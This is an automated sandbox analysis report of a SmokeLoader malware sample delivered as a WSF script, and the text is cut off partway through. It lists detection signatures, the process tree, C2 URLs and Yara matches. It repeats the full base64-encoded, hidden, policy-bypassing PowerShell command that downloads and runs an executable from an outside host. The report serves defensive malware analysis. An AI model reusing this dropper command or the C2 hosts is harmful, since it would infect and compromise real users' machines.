Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
w4DO1Z18yg.wsf

Overview

General Information

Sample name:w4DO1Z18yg.wsf
renamed because original name is a hash value
Original sample name:5c7d582ba61ac95fb0d330ecc05feeb4853ac1de1f5a6fd12df6491dd0b7ea34.wsf
Analysis ID:1525802
MD5:4f6cb09e56494f178fd06ee05c3880ac
SHA1:45810dc8fa00d54a302d8ea5a7563a21c93c94f4
SHA256:5c7d582ba61ac95fb0d330ecc05feeb4853ac1de1f5a6fd12df6491dd0b7ea34
Tags:bestmagazineforanimalsunicum-ruwsfuser-JAMESWT_MHT
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Net WebClient Casing Anomalies
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6536 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\w4DO1Z18yg.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1664 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6016 cmdline: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA= MD5: 04029E121A0CFA5991749937DD22A1D9)
        • oBuf.exe (PID: 4836 cmdline: "C:\Users\user~1\AppData\Local\Temp\oBuf.exe" MD5: 31059E7394B880F017E83804D9B716AB)
          • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • tesubba (PID: 7404 cmdline: C:\Users\user\AppData\Roaming\tesubba MD5: 31059E7394B880F017E83804D9B716AB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
SourceRuleDescriptionAuthorStrings
0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x654:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000F.00000002.1688128712.00000000005CD000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x3491:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x254:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 11 entries

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1664, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 6016, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1664, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 6016, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1664, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 6016, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1664, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 6016, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc 